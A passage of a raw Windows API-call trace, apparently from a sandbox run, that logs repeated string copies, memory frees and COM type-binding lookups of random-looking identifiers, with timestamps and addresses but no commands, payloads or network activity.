_mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x4852b8a | out: _Dst=0x87fc470) returned 0x0 [0060.118] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852b8a | out: _Dst=0x34767c) returned 0x0 [0060.118] CRetailMalloc_Free () returned 0x6140301 [0060.119] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852bae | out: _Dst=0x87fc470) returned 0x0 [0060.119] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852bae | out: _Dst=0x34767c) returned 0x0 [0060.119] CRetailMalloc_Free () returned 0x6140301 [0060.119] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x4852bd2 | out: _Dst=0x87fc470) returned 0x0 [0060.119] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852bd2 | out: _Dst=0x34767c) returned 0x0 [0060.119] CRetailMalloc_Free () returned 0x6140301 [0060.119] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x4852bf6 | out: _Dst=0x87fc470) returned 0x0 [0060.120] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852bf6 | out: _Dst=0x34767c) returned 0x0 [0060.120] CRetailMalloc_Free () returned 0x6140301 [0060.120] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852c1a | out: _Dst=0x87fc470) returned 0x0 [0060.120] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852c1a | out: _Dst=0x34767c) returned 0x0 [0060.120] CRetailMalloc_Free () returned 0x6140301 [0060.121] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x4852c3e | out: _Dst=0x87504e0) returned 0x0 [0060.121] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x4852c3e | out: _Dst=0x34767c) returned 0x0 [0060.121] CRetailMalloc_Free () returned 0xcae0401 [0060.121] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x4852c66 | out: _Dst=0x87fc470) returned 0x0 [0060.122] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852c66 | out: _Dst=0x34767c) returned 0x0 [0060.122] CRetailMalloc_Free () returned 0x6140301 [0060.122] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852c8a | out: _Dst=0x87fc470) returned 0x0 [0060.122] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852c8a | out: _Dst=0x34767c) returned 0x0 [0060.122] CRetailMalloc_Free () returned 0x6140301 [0060.122] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852cb2 | out: _Dst=0x87fc470) returned 0x0 [0060.123] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852cb2 | out: _Dst=0x34767c) returned 0x0 [0060.123] CRetailMalloc_Free () returned 0x6140301 [0060.123] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x4852cd6 | out: _Dst=0x87fc470) returned 0x0 [0060.123] CRetailMalloc_Realloc () returned 0x7759f50 [0060.123] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x4852cd6 | out: _Dst=0x34767c) returned 0x0 [0060.123] CRetailMalloc_Free () returned 0x6140301 [0060.123] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852cfa | out: _Dst=0x87fc470) returned 0x0 [0060.124] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852cfa | out: _Dst=0x34767c) returned 0x0 [0060.124] CRetailMalloc_Free () returned 0x6140301 [0060.124] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852d46 | out: _Dst=0x87fc470) returned 0x0 [0060.124] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852d46 | out: _Dst=0x34767c) returned 0x0 [0060.124] CRetailMalloc_Free () returned 0x6140301 [0060.124] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852d22 | out: _Dst=0x87fc470) returned 0x0 [0060.125] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852d22 | out: _Dst=0x34767c) returned 0x0 [0060.125] CRetailMalloc_Free () returned 0x6140301 [0060.125] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852d6a | out: _Dst=0x87fc470) returned 0x0 [0060.125] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852d6a | out: _Dst=0x34767c) returned 0x0 [0060.125] CRetailMalloc_Free () returned 0x6140301 [0060.125] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x4852d92 | out: _Dst=0x87fc470) returned 0x0 [0060.126] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852d92 | out: _Dst=0x34767c) returned 0x0 [0060.126] CRetailMalloc_Free () returned 0x6140301 [0060.126] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852db6 | out: _Dst=0x87fc470) returned 0x0 [0060.126] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852db6 | out: _Dst=0x34767c) returned 0x0 [0060.126] CRetailMalloc_Free () returned 0x6140301 [0060.126] CRetailMalloc_Realloc () returned 0x88045f0 [0060.126] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852dde | out: _Dst=0x87fc470) returned 0x0 [0060.127] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852dde | out: _Dst=0x34767c) returned 0x0 [0060.127] CRetailMalloc_Free () returned 0x6140301 [0060.127] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x4852e06 | out: _Dst=0x87fc470) returned 0x0 [0060.127] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x4852e06 | out: _Dst=0x34767c) returned 0x0 [0060.127] CRetailMalloc_Free () returned 0x6140301 [0060.127] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852e2a | out: _Dst=0x87fc470) returned 0x0 [0060.128] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852e2a | out: _Dst=0x34767c) returned 0x0 [0060.128] CRetailMalloc_Free () returned 0x6140301 [0060.128] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852e4e | out: _Dst=0x87fc470) returned 0x0 [0060.128] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852e4e | out: _Dst=0x34767c) returned 0x0 [0060.128] CRetailMalloc_Free () returned 0x6140301 [0060.128] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852e76 | out: _Dst=0x87fc470) returned 0x0 [0060.129] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852e76 | out: _Dst=0x34767c) returned 0x0 [0060.129] CRetailMalloc_Free () returned 0x6140301 [0060.129] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852e9e | out: _Dst=0x87fc470) returned 0x0 [0060.129] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852e9e | out: _Dst=0x34767c) returned 0x0 [0060.129] CRetailMalloc_Free () returned 0x6140301 [0060.129] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x4852ec2 | out: _Dst=0x87fc470) returned 0x0 [0060.130] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852ec2 | out: _Dst=0x34767c) returned 0x0 [0060.130] CRetailMalloc_Free () returned 0x6140301 [0060.130] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x4852ee6 | out: _Dst=0x87fc470) returned 0x0 [0060.130] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x4852ee6 | out: _Dst=0x34767c) returned 0x0 [0060.130] CRetailMalloc_Free () returned 0x6140301 [0060.130] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x4852f0a | out: _Dst=0x87504c0) returned 0x0 [0060.131] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x4852f0a | out: _Dst=0x34767c) returned 0x0 [0060.131] CRetailMalloc_Free () returned 0xcaa0401 [0060.131] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x4852f32 | out: _Dst=0x87fc470) returned 0x0 [0060.131] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852f32 | out: _Dst=0x34767c) returned 0x0 [0060.131] CRetailMalloc_Free () returned 0x6140301 [0060.131] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x4852f7e | out: _Dst=0x87504c0) returned 0x0 [0060.131] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x4852f7e | out: _Dst=0x34767c) returned 0x0 [0060.131] CRetailMalloc_Free () returned 0xcaa0401 [0060.132] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852f56 | out: _Dst=0x87fc470) returned 0x0 [0060.132] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852f56 | out: _Dst=0x34767c) returned 0x0 [0060.132] CRetailMalloc_Free () returned 0x6140301 [0060.132] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852fa6 | out: _Dst=0x87fc470) returned 0x0 [0060.132] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852fa6 | out: _Dst=0x34767c) returned 0x0 [0060.132] CRetailMalloc_Free () returned 0x6140301 [0060.133] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852fce | out: _Dst=0x87fc470) returned 0x0 [0060.133] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852fce | out: _Dst=0x34767c) returned 0x0 [0060.133] CRetailMalloc_Free () returned 0x6140301 [0060.133] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x4852ff2 | out: _Dst=0x87504c0) returned 0x0 [0060.133] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x4852ff2 | out: _Dst=0x34767c) returned 0x0 [0060.133] CRetailMalloc_Free () returned 0xcaa0401 [0060.134] CRetailMalloc_Realloc () returned 0x8875730 [0060.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537003e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="Y2HZBQ") returned 7 [0060.134] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Y2HZBQ", lHashVal=0x107d16, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x2aa | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x2aa) returned 0x0 [0060.134] CRetailMalloc_Alloc () returned 0x87fc470 [0060.134] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x537003e | out: _Dst=0x87fc470) returned 0x0 [0060.134] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x537003e | out: _Dst=0x34767c) returned 0x0 [0060.134] CRetailMalloc_Free () returned 0x6140301 [0060.135] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x537001a | out: _Dst=0x87fc470) returned 0x0 [0060.135] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x537001a | out: _Dst=0x34767c) returned 0x0 [0060.135] CRetailMalloc_Free () returned 0x6140301 [0060.135] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x5370062 | out: _Dst=0x87fc470) returned 0x0 [0060.135] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5370062 | out: _Dst=0x34767c) returned 0x0 [0060.135] CRetailMalloc_Free () returned 0x6140301 [0060.136] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537008a | out: _Dst=0x87504c0) returned 0x0 [0060.136] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537008a | out: _Dst=0x34767c) returned 0x0 [0060.136] CRetailMalloc_Free () returned 0xcaa0401 [0060.136] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x53700b2 | out: _Dst=0x87fc470) returned 0x0 [0060.136] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53700b2 | out: _Dst=0x34767c) returned 0x0 [0060.136] CRetailMalloc_Free () returned 0x6140301 [0060.137] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x53700d6 | out: _Dst=0x87fc470) returned 0x0 [0060.137] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53700d6 | out: _Dst=0x34767c) returned 0x0 [0060.137] CRetailMalloc_Free () returned 0x6140301 [0060.137] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x53700fa | out: _Dst=0x87fc470) returned 0x0 [0060.137] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53700fa | out: _Dst=0x34767c) returned 0x0 [0060.137] CRetailMalloc_Free () returned 0x6140301 [0060.138] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x537011e | out: _Dst=0x87fc470) returned 0x0 [0060.138] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x537011e | out: _Dst=0x34767c) returned 0x0 [0060.138] CRetailMalloc_Free () returned 0x6140301 [0060.138] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5370146 | out: _Dst=0x87504c0) returned 0x0 [0060.138] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5370146 | out: _Dst=0x34767c) returned 0x0 [0060.138] CRetailMalloc_Free () returned 0xcaa0401 [0060.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537016e, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="z4hSMAJ") returned 8 [0060.138] ITypeComp:RemoteBind (in: This=0x87ce890, szName="z4hSMAJ", lHashVal=0x10a31f, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x2ba | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x2ba) returned 0x0 [0060.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537016e, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="z4hSMAJ") returned 8 [0060.139] ITypeComp:RemoteBind (in: This=0x87ce668, szName="z4hSMAJ", lHashVal=0x10a31f, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x2ba | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x2ba) returned 0x0 [0060.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537016e, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="z4hSMAJ") returned 8 [0060.139] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="z4hSMAJ", lHashVal=0x10a31f, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x2ba | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x2ba) returned 0x0 [0060.139] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x537016e | out: _Dst=0x87fc470) returned 0x0 [0060.139] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537016e | out: _Dst=0x34767c) returned 0x0 [0060.139] CRetailMalloc_Free () returned 0x6140301 [0060.140] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x5370192 | out: _Dst=0x87fc470) returned 0x0 [0060.140] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5370192 | out: _Dst=0x34767c) returned 0x0 [0060.140] CRetailMalloc_Free () returned 0x6140301 [0060.141] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x53701ba | out: _Dst=0x87fc470) returned 0x0 [0060.141] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53701ba | out: _Dst=0x34767c) returned 0x0 [0060.141] CRetailMalloc_Free () returned 0x6140301 [0060.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53701de, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="UnIT9RK") returned 8 [0060.141] ITypeComp:RemoteBind (in: This=0x87ce890, szName="UnIT9RK", lHashVal=0x10a937, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x2c0 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x2c0) returned 0x0 [0060.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53701de, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="UnIT9RK") returned 8 [0060.142] ITypeComp:RemoteBind (in: This=0x87ce668, szName="UnIT9RK", lHashVal=0x10a937, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x2c0 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x2c0) returned 0x0 [0060.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x53701de, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="UnIT9RK") returned 8 [0060.142] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="UnIT9RK", lHashVal=0x10a937, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x2c0 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x2c0) returned 0x0 [0060.142] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x53701de | out: _Dst=0x87fc470) returned 0x0 [0060.142] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53701de | out: _Dst=0x34767c) returned 0x0 [0060.142] CRetailMalloc_Free () returned 0x6140301 [0060.143] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x5370202 | out: _Dst=0x87fc470) returned 0x0 [0060.143] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5370202 | out: _Dst=0x34767c) returned 0x0 [0060.143] CRetailMalloc_Free () returned 0x6140301 [0060.143] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x5370226 | out: _Dst=0x87fc470) returned 0x0 [0060.143] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5370226 | out: _Dst=0x34767c) returned 0x0 [0060.143] CRetailMalloc_Free () returned 0x6140301 [0060.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537024e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="fMNCX1") returned 7 [0060.143] ITypeComp:RemoteBind (in: This=0x87ce890, szName="fMNCX1", lHashVal=0x10b69a, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x2c6 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x2c6) returned 0x0 [0060.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537024e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="fMNCX1") returned 7 [0060.144] ITypeComp:RemoteBind (in: This=0x87ce668, szName="fMNCX1", lHashVal=0x10b69a, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x2c6 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x2c6) returned 0x0 [0060.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x537024e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="fMNCX1") returned 7 [0060.144] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="fMNCX1", lHashVal=0x10b69a, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x2c6 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x2c6) returned 0x0 [0060.144] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x537024e | out: _Dst=0x87fc470) returned 0x0 [0060.144] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x537024e | out: _Dst=0x34767c) returned 0x0 [0060.144] CRetailMalloc_Free () returned 0x6140301 [0060.144] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x5370272 | out: _Dst=0x87fc470) returned 0x0 [0060.145] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5370272 | out: _Dst=0x34767c) returned 0x0 [0060.145] CRetailMalloc_Free () returned 0x6140301 [0060.145] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x53702ba | out: _Dst=0x87fc470) returned 0x0 [0060.145] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53702ba | out: _Dst=0x34767c) returned 0x0 [0060.145] CRetailMalloc_Free () returned 0x6140301 [0060.146] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x5370296 | out: _Dst=0x87fc470) returned 0x0 [0060.146] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5370296 | out: _Dst=0x34767c) returned 0x0 [0060.146] CRetailMalloc_Free () returned 0x6140301 [0060.146] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x53702e2 | out: _Dst=0x87fc470) returned 0x0 [0060.146] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53702e2 | out: _Dst=0x34767c) returned 0x0 [0060.146] CRetailMalloc_Free () returned 0x6140301 [0060.146] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x537030a | out: _Dst=0x87fc470) returned 0x0 [0060.147] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x537030a | out: _Dst=0x34767c) returned 0x0 [0060.147] CRetailMalloc_Free () returned 0x6140301 [0060.147] CRetailMalloc_Realloc () returned 0x8876938 [0060.147] CRetailMalloc_Alloc () returned 0x87fc470 [0060.147] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x537032e | out: _Dst=0x87fc470) returned 0x0 [0060.148] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x537032e | out: _Dst=0x34767c) returned 0x0 [0060.148] CRetailMalloc_Free () returned 0x6140301 [0060.148] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x5370356 | out: _Dst=0x87fc470) returned 0x0 [0060.148] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5370356 | out: _Dst=0x34767c) returned 0x0 [0060.148] CRetailMalloc_Free () returned 0x6140301 [0060.148] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x537037a | out: _Dst=0x87fc470) returned 0x0 [0060.149] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x537037a | out: _Dst=0x34767c) returned 0x0 [0060.149] CRetailMalloc_Free () returned 0x6140301 [0060.149] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x537039e | out: _Dst=0x87fc470) returned 0x0 [0060.149] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x537039e | out: _Dst=0x34767c) returned 0x0 [0060.149] CRetailMalloc_Free () returned 0x6140301 [0060.149] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x53703c6 | out: _Dst=0x87fc470) returned 0x0 [0060.150] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53703c6 | out: _Dst=0x34767c) returned 0x0 [0060.150] CRetailMalloc_Free () returned 0x6140301 [0060.150] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x53703ea | out: _Dst=0x87504c0) returned 0x0 [0060.150] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x53703ea | out: _Dst=0x34767c) returned 0x0 [0060.150] CRetailMalloc_Free () returned 0xcaa0401 [0060.150] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x5370412 | out: _Dst=0x87fc470) returned 0x0 [0060.151] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701ffe, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_v5KUXQjZ") returned 16 [0060.151] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_v5KUXQjZ", lHashVal=0x10c027, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.151] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5370412 | out: _Dst=0x34767c) returned 0x0 [0060.151] CRetailMalloc_Free () returned 0x6140301 [0060.151] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x537043a | out: _Dst=0x87fc470) returned 0x0 [0060.151] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x537043a | out: _Dst=0x34767c) returned 0x0 [0060.152] CRetailMalloc_Free () returned 0x6140301 [0060.153] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x5370462 | out: _Dst=0x87fc470) returned 0x0 [0060.153] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5370462 | out: _Dst=0x34767c) returned 0x0 [0060.153] CRetailMalloc_Free () returned 0x6140301 [0060.153] _mbscpy_s (in: _Dst=0x87504c0, 